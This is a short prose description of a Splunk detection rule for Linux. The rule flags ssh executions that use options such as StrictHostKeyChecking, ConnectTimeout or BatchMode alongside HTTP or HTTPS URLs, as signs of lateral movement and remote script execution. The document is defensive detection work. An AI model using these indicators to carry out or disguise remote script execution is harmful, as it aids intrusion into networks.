This detection rule analyzes SSH command executions on Linux systems to identify potential lateral movement and unauthorized script execution by attackers. It relies on telemetry data from Endpoint Detection and Response (EDR) agents, specifically capturing processes named 'ssh' that utilize certain command-line parameters indicative of suspicious activities, such as 'oStrictHostKeyChecking', 'oConnectTimeout', or 'oBatchMode', combined with URLs (both HTTP and HTTPS). The significance of this detection lies in its ability to uncover malicious attempts to execute scripts remotely, which could escalate privileges, compromise additional systems, or propagate malware within the network. The search utilizes Splunk's data model for processes to correlate events accurately and generate alerts when suspicious patterns are observed, while also accommodating possible false positives through specific filters.